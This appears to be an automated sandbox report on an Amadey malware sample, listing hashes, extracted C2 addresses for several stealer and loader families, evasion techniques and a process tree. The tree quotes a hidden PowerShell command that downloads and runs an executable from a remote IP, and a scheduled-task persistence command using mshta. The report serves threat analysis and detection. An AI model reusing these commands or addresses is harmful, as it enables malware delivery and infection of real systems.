amadey | 199b55fec7e308c69f1465301ab74aed087127126ba8ab4593a99e132458012b

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 09:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61f742eba9e1c987ef5c084f46a399ca.exe
Size

1.8MB
MD5

61f742eba9e1c987ef5c084f46a399ca
SHA1

85facc0fd5b92a0d89bbbd02e4026dea86c1f293
SHA256

199b55fec7e308c69f1465301ab74aed087127126ba8ab4593a99e132458012b
SHA512

6264adf0546b77d1cb80249ce49974b9810df49fb8bfc0b8b94910c2880ccead8282cd3020055fd7f4e6ecad4c0b8a925f4c813071e9aa4babe1e014316d4239
SSDEEP

49152:oBpc2KPHXkb83CUeRvdM4PdIY//DuFmKMkflZEP6KWTFlhs:omUb83CUElnlCEUfYPL+H

Score

10^/10

amadey asyncrat gcleaner lumma stormkitty 092155 defense_evasion discovery execution loader persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://synmedsp.live/lzkdj

https://starcloc.bet/GOksAo

https://targett.top/dsANGt

https://sspacedbv.world/EKdlsk

https://rlxspoty.run/nogoaz

https://jrxsafer.top/shpaoz

https://zkrxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/3396-300-0x0000000000400000-0x000000000073E000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	but2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	61f742eba9e1c987ef5c084f46a399ca.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	130f6b4251.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a24df40473.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7fcccf4ebd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	80502d0525.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
25	3608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3608	powershell.exe

Downloads MZ/PE file 15 IoCs

flow	pid	Process
83	4172	svchost015.exe
84	5968	svchost015.exe
94	4560	rapes.exe
94	4560	rapes.exe
94	4560	rapes.exe
94	4560	rapes.exe
94	4560	rapes.exe
25	3608	powershell.exe
87	4560	rapes.exe
21	4560	rapes.exe
21	4560	rapes.exe
21	4560	rapes.exe
21	4560	rapes.exe
21	4560	rapes.exe
21	4560	rapes.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	80502d0525.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7fcccf4ebd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	61f742eba9e1c987ef5c084f46a399ca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	130f6b4251.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7fcccf4ebd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1c87ab7903.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	130f6b4251.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a24df40473.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	61f742eba9e1c987ef5c084f46a399ca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	80502d0525.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a24df40473.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1c87ab7903.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	61f742eba9e1c987ef5c084f46a399ca.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 22 IoCs

pid	Process
4560	rapes.exe
3216	236de5c123.exe
2412	80502d0525.exe
3888	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
5084	c7c0b8b67d.exe
4172	svchost015.exe
1904	130f6b4251.exe
5464	rapes.exe
5968	svchost015.exe
5824	V8LkpDo.exe
4944	QWWouxX.exe
3848	rapes.exe
3948	neww.exe
4352	neww.exe
5208	but2.exe
5556	pcidrv.exe
5604	i4cwegu.exe
5068	Rm3cVPI.exe
5140	a24df40473.exe
5988	7fcccf4ebd.exe
5780	1c87ab7903.exe
3388	bca55de347.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	a24df40473.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	80502d0525.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	but2.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	7fcccf4ebd.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	61f742eba9e1c987ef5c084f46a399ca.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	130f6b4251.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe

Loads dropped DLL 10 IoCs

pid	Process
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe
4352	neww.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7fcccf4ebd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10444770101\\7fcccf4ebd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c87ab7903.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10444780101\\1c87ab7903.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
90	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000b0000000240fb-26.dat	autoit_exe
behavioral1/files/0x0007000000024304-415.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
5204	61f742eba9e1c987ef5c084f46a399ca.exe
4560	rapes.exe
2412	80502d0525.exe
3888	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
1904	130f6b4251.exe
5464	rapes.exe
3848	rapes.exe
5208	but2.exe
5140	a24df40473.exe
5988	7fcccf4ebd.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 5084 set thread context of 4172	5084	c7c0b8b67d.exe	112
PID 1904 set thread context of 5968	1904	130f6b4251.exe	119
PID 4352 set thread context of 3396	4352	neww.exe	132

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	61f742eba9e1c987ef5c084f46a399ca.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5328	3396	WerFault.exe	132

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a24df40473.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	61f742eba9e1c987ef5c084f46a399ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	236de5c123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7fcccf4ebd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c7c0b8b67d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	130f6b4251.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	but2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bca55de347.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	bca55de347.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	bca55de347.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QWWouxX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcidrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i4cwegu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	80502d0525.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2924	timeout.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
1940	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6044	schtasks.exe
1648	schtasks.exe
2064	schtasks.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
5204	61f742eba9e1c987ef5c084f46a399ca.exe
5204	61f742eba9e1c987ef5c084f46a399ca.exe
4560	rapes.exe
4560	rapes.exe
3608	powershell.exe
3608	powershell.exe
2412	80502d0525.exe
2412	80502d0525.exe
3888	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
3888	TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
2412	80502d0525.exe
2412	80502d0525.exe
2412	80502d0525.exe
2412	80502d0525.exe
1904	130f6b4251.exe
1904	130f6b4251.exe
5464	rapes.exe
5464	rapes.exe
4944	QWWouxX.exe
4944	QWWouxX.exe
4944	QWWouxX.exe
4944	QWWouxX.exe
4944	QWWouxX.exe
4944	QWWouxX.exe
3848	rapes.exe
3848	rapes.exe
5208	but2.exe
5208	but2.exe
5140	a24df40473.exe
5140	a24df40473.exe
5140	a24df40473.exe
5140	a24df40473.exe
5140	a24df40473.exe
5140	a24df40473.exe
5068	Rm3cVPI.exe
5068	Rm3cVPI.exe
5068	Rm3cVPI.exe
5068	Rm3cVPI.exe
5988	7fcccf4ebd.exe
5988	7fcccf4ebd.exe
5988	7fcccf4ebd.exe
5988	7fcccf4ebd.exe
5988	7fcccf4ebd.exe
5988	7fcccf4ebd.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeRestorePrivilege	4352	neww.exe
Token: SeBackupPrivilege	4352	neww.exe
Token: SeDebugPrivilege	4352	neww.exe
Token: SeDebugPrivilege	3396	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	3396	AddInProcess32.exe
Token: SeSecurityPrivilege	3396	AddInProcess32.exe
Token: SeTakeOwnershipPrivilege	3396	AddInProcess32.exe
Token: SeLoadDriverPrivilege	3396	AddInProcess32.exe
Token: SeSystemProfilePrivilege	3396	AddInProcess32.exe
Token: SeSystemtimePrivilege	3396	AddInProcess32.exe
Token: SeProfSingleProcessPrivilege	3396	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	3396	AddInProcess32.exe
Token: SeCreatePagefilePrivilege	3396	AddInProcess32.exe
Token: SeBackupPrivilege	3396	AddInProcess32.exe
Token: SeRestorePrivilege	3396	AddInProcess32.exe
Token: SeShutdownPrivilege	3396	AddInProcess32.exe
Token: SeDebugPrivilege	3396	AddInProcess32.exe
Token: SeSystemEnvironmentPrivilege	3396	AddInProcess32.exe
Token: SeRemoteShutdownPrivilege	3396	AddInProcess32.exe
Token: SeUndockPrivilege	3396	AddInProcess32.exe
Token: SeManageVolumePrivilege	3396	AddInProcess32.exe
Token: 33	3396	AddInProcess32.exe
Token: 34	3396	AddInProcess32.exe
Token: 35	3396	AddInProcess32.exe
Token: 36	3396	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	3396	AddInProcess32.exe
Token: SeSecurityPrivilege	3396	AddInProcess32.exe
Token: SeTakeOwnershipPrivilege	3396	AddInProcess32.exe
Token: SeLoadDriverPrivilege	3396	AddInProcess32.exe
Token: SeSystemProfilePrivilege	3396	AddInProcess32.exe
Token: SeSystemtimePrivilege	3396	AddInProcess32.exe
Token: SeProfSingleProcessPrivilege	3396	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	3396	AddInProcess32.exe
Token: SeCreatePagefilePrivilege	3396	AddInProcess32.exe
Token: SeBackupPrivilege	3396	AddInProcess32.exe
Token: SeRestorePrivilege	3396	AddInProcess32.exe
Token: SeShutdownPrivilege	3396	AddInProcess32.exe
Token: SeDebugPrivilege	3396	AddInProcess32.exe
Token: SeSystemEnvironmentPrivilege	3396	AddInProcess32.exe
Token: SeRemoteShutdownPrivilege	3396	AddInProcess32.exe
Token: SeUndockPrivilege	3396	AddInProcess32.exe
Token: SeManageVolumePrivilege	3396	AddInProcess32.exe
Token: 33	3396	AddInProcess32.exe
Token: 34	3396	AddInProcess32.exe
Token: 35	3396	AddInProcess32.exe
Token: 36	3396	AddInProcess32.exe
Token: SeDebugPrivilege	1940	taskkill.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
3216	236de5c123.exe
3216	236de5c123.exe
3216	236de5c123.exe
3388	bca55de347.exe
3388	bca55de347.exe
3388	bca55de347.exe
3388	bca55de347.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
3216	236de5c123.exe
3216	236de5c123.exe
3216	236de5c123.exe
3388	bca55de347.exe
3388	bca55de347.exe
3388	bca55de347.exe
3388	bca55de347.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5204 wrote to memory of 4560	5204	61f742eba9e1c987ef5c084f46a399ca.exe	89
PID 5204 wrote to memory of 4560	5204	61f742eba9e1c987ef5c084f46a399ca.exe	89
PID 5204 wrote to memory of 4560	5204	61f742eba9e1c987ef5c084f46a399ca.exe	89
PID 4560 wrote to memory of 3216	4560	rapes.exe	95
PID 4560 wrote to memory of 3216	4560	rapes.exe	95
PID 4560 wrote to memory of 3216	4560	rapes.exe	95
PID 3216 wrote to memory of 2848	3216	236de5c123.exe	96
PID 3216 wrote to memory of 2848	3216	236de5c123.exe	96
PID 3216 wrote to memory of 2848	3216	236de5c123.exe	96
PID 3216 wrote to memory of 1196	3216	236de5c123.exe	97
PID 3216 wrote to memory of 1196	3216	236de5c123.exe	97
PID 3216 wrote to memory of 1196	3216	236de5c123.exe	97
PID 2848 wrote to memory of 6044	2848	cmd.exe	99
PID 2848 wrote to memory of 6044	2848	cmd.exe	99
PID 2848 wrote to memory of 6044	2848	cmd.exe	99
PID 1196 wrote to memory of 3608	1196	mshta.exe	100
PID 1196 wrote to memory of 3608	1196	mshta.exe	100
PID 1196 wrote to memory of 3608	1196	mshta.exe	100
PID 4560 wrote to memory of 2412	4560	rapes.exe	104
PID 4560 wrote to memory of 2412	4560	rapes.exe	104
PID 4560 wrote to memory of 2412	4560	rapes.exe	104
PID 3608 wrote to memory of 3888	3608	powershell.exe	105
PID 3608 wrote to memory of 3888	3608	powershell.exe	105
PID 3608 wrote to memory of 3888	3608	powershell.exe	105
PID 4560 wrote to memory of 5084	4560	rapes.exe	108
PID 4560 wrote to memory of 5084	4560	rapes.exe	108
PID 4560 wrote to memory of 5084	4560	rapes.exe	108
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 5084 wrote to memory of 4172	5084	c7c0b8b67d.exe	112
PID 4560 wrote to memory of 1904	4560	rapes.exe	117
PID 4560 wrote to memory of 1904	4560	rapes.exe	117
PID 4560 wrote to memory of 1904	4560	rapes.exe	117
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 1904 wrote to memory of 5968	1904	130f6b4251.exe	119
PID 4560 wrote to memory of 5824	4560	rapes.exe	120
PID 4560 wrote to memory of 5824	4560	rapes.exe	120
PID 4560 wrote to memory of 4944	4560	rapes.exe	122
PID 4560 wrote to memory of 4944	4560	rapes.exe	122
PID 4560 wrote to memory of 4944	4560	rapes.exe	122
PID 4560 wrote to memory of 3948	4560	rapes.exe	127
PID 4560 wrote to memory of 3948	4560	rapes.exe	127
PID 3948 wrote to memory of 4352	3948	neww.exe	129
PID 3948 wrote to memory of 4352	3948	neww.exe	129
PID 4352 wrote to memory of 2772	4352	neww.exe	130
PID 4352 wrote to memory of 2772	4352	neww.exe	130
PID 4352 wrote to memory of 2772	4352	neww.exe	130
PID 4352 wrote to memory of 220	4352	neww.exe	131
PID 4352 wrote to memory of 220	4352	neww.exe	131
PID 4352 wrote to memory of 220	4352	neww.exe	131
PID 4352 wrote to memory of 3396	4352	neww.exe	132

C:\Users\Admin\AppData\Local\Temp\61f742eba9e1c987ef5c084f46a399ca.exe
"C:\Users\Admin\AppData\Local\Temp\61f742eba9e1c987ef5c084f46a399ca.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5204
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Users\Admin\AppData\Local\Temp\10444660101\236de5c123.exe
    "C:\Users\Admin\AppData\Local\Temp\10444660101\236de5c123.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn SnGuAma1sMu /tr "mshta C:\Users\Admin\AppData\Local\Temp\QsXSpsYcL.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2848
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn SnGuAma1sMu /tr "mshta C:\Users\Admin\AppData\Local\Temp\QsXSpsYcL.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6044
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\QsXSpsYcL.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1196
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3608
      - C:\Users\Admin\AppData\Local\TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE
        
        "C:\Users\Admin\AppData\Local\TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3888
- - C:\Users\Admin\AppData\Local\Temp\10444670101\80502d0525.exe
    "C:\Users\Admin\AppData\Local\Temp\10444670101\80502d0525.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2412
- - C:\Users\Admin\AppData\Local\Temp\10444680101\c7c0b8b67d.exe
    "C:\Users\Admin\AppData\Local\Temp\10444680101\c7c0b8b67d.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10444680101\c7c0b8b67d.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4172
- - C:\Users\Admin\AppData\Local\Temp\10444690101\130f6b4251.exe
    "C:\Users\Admin\AppData\Local\Temp\10444690101\130f6b4251.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
